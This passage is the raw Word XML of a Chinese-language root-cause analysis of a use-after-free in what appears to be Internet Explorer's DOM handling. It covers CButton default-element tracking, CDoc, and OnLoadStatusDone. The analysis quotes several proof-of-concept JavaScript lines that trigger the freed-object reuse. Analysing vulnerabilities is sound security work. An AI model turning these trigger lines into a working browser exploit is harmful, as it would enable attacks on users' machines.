          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="004640F5">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00D60C6E">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004640F5">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r w:rsidR="004640F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="004640F5">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s_element</w:t>
      </w:r>
      <w:r w:rsidR="004640F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，则将this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>赋值给default_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC2628" w:rsidRDefault="000E0488" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对于POC，首先在</w:t>
      </w:r>
      <w:r w:rsidR="000C4325">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4325">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e1.appendChild(document.createElement('button'));</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4325">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="000C4325">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会调用</w:t>
      </w:r>
      <w:r w:rsidR="000C4325" w:rsidRPr="00555BDB">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::SetDefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="000C4325">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，并且</w:t>
      </w:r>
      <w:r w:rsidR="00745BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00745BB9">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_release = 0</w:t>
      </w:r>
      <w:r w:rsidR="00745BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkEnd w:id="47"/>
    <w:p w:rsidR="00745BB9" w:rsidRDefault="000E45D2" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F68445B" wp14:editId="03190D84">
            <wp:extent cx="6645910" cy="35725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C6" w:rsidRDefault="001357C6" w:rsidP="00CE639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2A7484F" wp14:editId="0F1EDA8F">
            <wp:extent cx="6645910" cy="3704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AE" w:rsidRDefault="000240AE" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000240AE" w:rsidRDefault="000240AE" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58F1F929" wp14:editId="28891F1F">
            <wp:extent cx="6645910" cy="40995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4B" w:rsidRDefault="0024144B" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0024144B" w:rsidRDefault="0024144B" w:rsidP="0024144B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="OLE_LINK49"/>
      <w:bookmarkStart w:id="49" w:name="OLE_LINK50"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接着在</w:t>
      </w:r>
      <w:r w:rsidR="0068702C" w:rsidRPr="0068702C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e2.innerHTML = "";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidR="005922FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00555BDB">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::SetDefaultElem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，并且is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">_release = </w:t>
      </w:r>
      <w:r w:rsidR="00FC2891"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</w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkEnd w:id="49"/>
    <w:p w:rsidR="0024144B" w:rsidRDefault="003E5F9C" w:rsidP="00CE639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F6263E" wp14:editId="54BB5323">
            <wp:extent cx="6645910" cy="37934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D" w:rsidRDefault="0007253D" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0052410F" w:rsidRDefault="0007253D" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="646A2C37" wp14:editId="2022677B">
            <wp:extent cx="6645910" cy="36734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96" w:rsidRDefault="00947696" w:rsidP="00CE639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014AF66" wp14:editId="04998C9D">
            <wp:extent cx="6645910" cy="37979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68" w:rsidRDefault="00C47F74" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="550D9D9C" wp14:editId="72DEC321">
            <wp:extent cx="6645910" cy="35756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D4" w:rsidRDefault="002E2C68" w:rsidP="007C6DD4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="OLE_LINK51"/>
      <w:bookmarkStart w:id="51" w:name="OLE_LINK52"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因此，漏洞的本质是在</w:t>
      </w:r>
      <w:r w:rsidR="003756F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建C</w:t>
      </w:r>
      <w:r w:rsidR="003756F8">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidR="003756F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的DOM树时，会在父节点的de</w:t>
      </w:r>
      <w:r w:rsidR="003756F8">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fault_element</w:t>
      </w:r>
      <w:r w:rsidR="003756F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>保存该C</w:t>
      </w:r>
      <w:r w:rsidR="003756F8">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidR="003756F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的引用，由于POC中创建C</w:t>
      </w:r>
      <w:r w:rsidR="003756F8">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidR="003756F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是父节点不是Form，因此在CDoc的de</w:t>
      </w:r>
      <w:r w:rsidR="003756F8">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fault_element</w:t>
      </w:r>
      <w:r w:rsidR="003756F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>保存该C</w:t>
      </w:r>
      <w:r w:rsidR="003756F8">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidR="003756F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的引用，但是随后POC</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidR="003756F8" w:rsidRPr="003756F8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e1.applyElement(e0);</w:t>
      </w:r>
      <w:r w:rsidR="003756F8" w:rsidRPr="003756F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为C</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象的DOM树中添加父节点Form，从而在</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="007C6DD4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e2.innerHTML = "";</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="007C6DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误的释放了parent</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Form</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的default</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_element</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CDoc的de</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fault_element</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>仍然保存该C</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的引用，最终在</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bo</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dy</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签的</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>onload</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>事件完成时调用</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CMarkup::OnLoadStatusDone</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:bookmarkStart w:id="52" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会调用</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::FindDefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查找当前CDoc对象的默认元素，获取当前CDo</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成员变量时，因为</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::GetParentForm</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回0，从而返回的是记录在CDo</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成员变量也就是已经被释放的C</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="007C6DD4" w:rsidRPr="00BB412A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>utton对象指针，最终造成了UAF漏洞。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkEnd w:id="51"/>
    <w:p w:rsidR="002E2C68" w:rsidRPr="007C6DD4" w:rsidRDefault="002E2C68" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002E2C68" w:rsidRPr="007C6DD4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0AF" w:rsidRDefault="00ED50AF" w:rsidP="00400308">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00ED50AF" w:rsidRDefault="00ED50AF" w:rsidP="0040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0AF" w:rsidRDefault="00ED50AF" w:rsidP="00400308">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00ED50AF" w:rsidRDefault="00ED50AF" w:rsidP="0040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608B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB2C5D54"/>
    <w:lvl w:ilvl="0" w:tplc="7A22F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D7373"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C248F9E"/>
    <w:lvl w:ilvl="0" w:tplc="CCB27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D83688"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E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17CC7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8B6C8C2"/>
    <w:lvl w:ilvl="0" w:tplc="7B76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DB2F30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD8AAE7C"/>
    <w:lvl w:ilvl="0" w:tplc="0090F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DD1FB2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E6C3C2C"/>
    <w:lvl w:ilvl="0" w:tplc="C440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350ED1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF32533A"/>
    <w:lvl w:ilvl="0" w:tplc="EDF6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4919C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4DDAF750"/>
    <w:lvl w:ilvl="0" w:tplc="420C17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DA4E08"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9C34038C"/>
    <w:lvl w:ilvl="0" w:tplc="5E3EF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C52B9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9738C74C"/>
    <w:lvl w:ilvl="0" w:tplc="565A4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721423"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="455C6F08"/>
    <w:lvl w:ilvl="0" w:tplc="EF24C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17"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="8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5A"/>
    <w:rsid w:val="0000118F"/>
    <w:rsid w:val="000016CD"/>
    <w:rsid w:val="000040FD"/>
    <w:rsid w:val="00006967"/>
    <w:rsid w:val="00006F2C"/>
    <w:rsid w:val="00011689"/>
    <w:rsid w:val="00015336"/>
    <w:rsid w:val="0001564F"/>
    <w:rsid w:val="00022162"/>
    <w:rsid w:val="000223CF"/>
    <w:rsid w:val="0002338C"/>
    <w:rsid w:val="000240AE"/>
    <w:rsid w:val="00024B34"/>
    <w:rsid w:val="00024ECA"/>
    <w:rsid w:val="00034740"/>
    <w:rsid w:val="00035617"/>
    <w:rsid w:val="00035991"/>
    <w:rsid w:val="00036488"/>
    <w:rsid w:val="0003711D"/>
    <w:rsid w:val="000375B1"/>
    <w:rsid w:val="00037AB8"/>
    <w:rsid w:val="00037F31"/>
    <w:rsid w:val="000417E0"/>
    <w:rsid w:val="00042826"/>
    <w:rsid w:val="0004489A"/>
    <w:rsid w:val="0004682D"/>
    <w:rsid w:val="00047BEF"/>
    <w:rsid w:val="00054454"/>
    <w:rsid w:val="000544C4"/>
    <w:rsid w:val="00057376"/>
    <w:rsid w:val="00057CF4"/>
    <w:rsid w:val="000610D5"/>
    <w:rsid w:val="00061E9A"/>
    <w:rsid w:val="00063425"/>
    <w:rsid w:val="000638A4"/>
    <w:rsid w:val="00063E3E"/>
    <w:rsid w:val="0007009B"/>
    <w:rsid w:val="0007253D"/>
    <w:rsid w:val="00072D2D"/>
    <w:rsid w:val="00074A08"/>
    <w:rsid w:val="00074A85"/>
    <w:rsid w:val="00075865"/>
    <w:rsid w:val="000804E3"/>
    <w:rsid w:val="000812A5"/>
    <w:rsid w:val="00082621"/>
    <w:rsid w:val="00083254"/>
    <w:rsid w:val="0009015C"/>
    <w:rsid w:val="00091B42"/>
    <w:rsid w:val="000923B5"/>
    <w:rsid w:val="00093CA7"/>
    <w:rsid w:val="00094C6A"/>
    <w:rsid w:val="0009564F"/>
    <w:rsid w:val="00095C8E"/>
    <w:rsid w:val="000A1383"/>
    <w:rsid w:val="000A3AFC"/>
    <w:rsid w:val="000A440A"/>
    <w:rsid w:val="000A4F56"/>
    <w:rsid w:val="000A534A"/>
    <w:rsid w:val="000A604F"/>
    <w:rsid w:val="000B3C03"/>
    <w:rsid w:val="000B4736"/>
    <w:rsid w:val="000B7E8F"/>
    <w:rsid w:val="000C05EE"/>
    <w:rsid w:val="000C4325"/>
    <w:rsid w:val="000C4634"/>
    <w:rsid w:val="000C675B"/>
    <w:rsid w:val="000C6E89"/>
    <w:rsid w:val="000C7FCE"/>
    <w:rsid w:val="000D220A"/>
    <w:rsid w:val="000D2E96"/>
    <w:rsid w:val="000E0488"/>
    <w:rsid w:val="000E0CB7"/>
    <w:rsid w:val="000E1D57"/>
    <w:rsid w:val="000E38BB"/>
    <w:rsid w:val="000E45D2"/>
    <w:rsid w:val="000E6689"/>
    <w:rsid w:val="000E6DB1"/>
    <w:rsid w:val="000F44A0"/>
    <w:rsid w:val="000F5610"/>
    <w:rsid w:val="000F56F8"/>
    <w:rsid w:val="000F6150"/>
    <w:rsid w:val="0010329B"/>
    <w:rsid w:val="001042E5"/>
    <w:rsid w:val="00106079"/>
    <w:rsid w:val="001065D4"/>
    <w:rsid w:val="00107C7F"/>
    <w:rsid w:val="00111AF8"/>
    <w:rsid w:val="0011276D"/>
    <w:rsid w:val="00112942"/>
    <w:rsid w:val="00114D5B"/>
    <w:rsid w:val="001161C5"/>
    <w:rsid w:val="001220E7"/>
    <w:rsid w:val="0012288F"/>
    <w:rsid w:val="00126C85"/>
    <w:rsid w:val="00127296"/>
    <w:rsid w:val="00131DFE"/>
    <w:rsid w:val="00132EC3"/>
    <w:rsid w:val="00134702"/>
    <w:rsid w:val="001357C6"/>
    <w:rsid w:val="00136035"/>
    <w:rsid w:val="00143550"/>
    <w:rsid w:val="00143554"/>
    <w:rsid w:val="00143E80"/>
    <w:rsid w:val="00144120"/>
    <w:rsid w:val="0014574A"/>
    <w:rsid w:val="001478FC"/>
    <w:rsid w:val="00150D09"/>
    <w:rsid w:val="00151AFD"/>
    <w:rsid w:val="00151B27"/>
    <w:rsid w:val="00151FB6"/>
    <w:rsid w:val="001525E1"/>
    <w:rsid w:val="001561C7"/>
    <w:rsid w:val="001566EA"/>
    <w:rsid w:val="00162BA6"/>
    <w:rsid w:val="00164777"/>
    <w:rsid w:val="00167B4B"/>
    <w:rsid w:val="00171611"/>
    <w:rsid w:val="00171C48"/>
    <w:rsid w:val="001734E6"/>
    <w:rsid w:val="0017381F"/>
    <w:rsid w:val="001744B5"/>
    <w:rsid w:val="00175F9C"/>
    <w:rsid w:val="00177198"/>
    <w:rsid w:val="001778A3"/>
    <w:rsid w:val="001807D9"/>
    <w:rsid w:val="001816B6"/>
    <w:rsid w:val="001829A7"/>
    <w:rsid w:val="00184582"/>
    <w:rsid w:val="00190FB1"/>
    <w:rsid w:val="0019459F"/>
    <w:rsid w:val="00196557"/>
    <w:rsid w:val="0019764B"/>
    <w:rsid w:val="001A1084"/>
    <w:rsid w:val="001A1306"/>
    <w:rsid w:val="001A38ED"/>
    <w:rsid w:val="001A7CD8"/>
    <w:rsid w:val="001A7DD4"/>
    <w:rsid w:val="001B1100"/>
    <w:rsid w:val="001B1CBD"/>
    <w:rsid w:val="001B28EF"/>
    <w:rsid w:val="001C0499"/>
    <w:rsid w:val="001C1217"/>
    <w:rsid w:val="001C1379"/>
    <w:rsid w:val="001C187B"/>
    <w:rsid w:val="001C388B"/>
    <w:rsid w:val="001C4A0F"/>
    <w:rsid w:val="001D08EE"/>
    <w:rsid w:val="001D118B"/>
    <w:rsid w:val="001D1901"/>
    <w:rsid w:val="001D2E20"/>
    <w:rsid w:val="001D5BA1"/>
    <w:rsid w:val="001D676C"/>
    <w:rsid w:val="001D6DE5"/>
    <w:rsid w:val="001E02D5"/>
    <w:rsid w:val="001E086D"/>
    <w:rsid w:val="001E1760"/>
    <w:rsid w:val="001E18A7"/>
    <w:rsid w:val="001E36C2"/>
    <w:rsid w:val="001E44BD"/>
    <w:rsid w:val="001E5DDE"/>
    <w:rsid w:val="001E5EED"/>
    <w:rsid w:val="001E79EC"/>
    <w:rsid w:val="001F0793"/>
    <w:rsid w:val="001F13AC"/>
